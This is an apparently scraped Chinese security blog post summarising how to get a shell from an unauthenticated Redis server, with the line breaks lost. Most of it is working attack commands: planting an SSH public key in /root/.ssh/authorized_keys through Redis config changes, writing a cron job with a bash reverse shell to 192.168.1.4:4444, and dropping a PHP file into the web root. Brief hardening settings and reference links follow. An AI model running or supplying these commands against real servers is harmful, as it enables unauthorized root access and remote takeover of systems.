redis-cli -h ip> info
ssh-keygen –t rsa
(echo -e "nn"; cat /root/.ssh/id_rsa.pub; echo -e "nn") > wk.txt
cat wk.txt | redis-cli -h 192.168.1.11 -x set crackitOK
$ $ redis-cli -h 192.168.1.11$ 192.168.1.11:6379> config set dir /root/.ssh/OK$ 192.168.1.11:6379> config get dir1) "dir"2) "/root/.ssh"$ 192.168.1.11:6379> config set dbfilename "authorized_keys"OK$ 192.168.1.11:6379> saveOK
ssh –i id_rsa [email protected]cat wk.txt | redis-cli -h 192.168.1.11 -x set crackit(error) READONLY You can't write against a read only slave.
config set slave-read-only noconfig set dir /root/.ssh/(error) ERR Changing directory: No such file or directory
config set dir /home/user/.ssh/config set dir /root/.ssh/(error) ERR Changing directory: Permission denied
redis-cli -h 192.168.1.8set test "n* * * * * bash -i >& /dev/tcp/192.168.1.4/4444 0>&1n"config set dir /var/spool/cronconfig set dbfilename "root"save
config set dir /var/www/html/config set dbfilename shell.phpset cmd "<?php phpinfo(); ?>"save
rename-command FLUSHALL ""rename-command CONFIG ""rename-command EVAL ""
groupadd -r redis && useradd -r -g redis redisrequirepass mypasswordbind 127.0.0.1https://mp.weixin.qq.com/s?__biz=Mzg5OTYxMjk0Mw==&mid=2247484550&idx=1&sn=ef0cd710fc188ab67e44354097230381https://blog.csdn.net/sojrs_sec/article/details/100999908https://www.cnblogs.com/morgan363/p/13719830.html
原文始发于微信公众号(Reset安全):Redis未授权访问getshell小结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论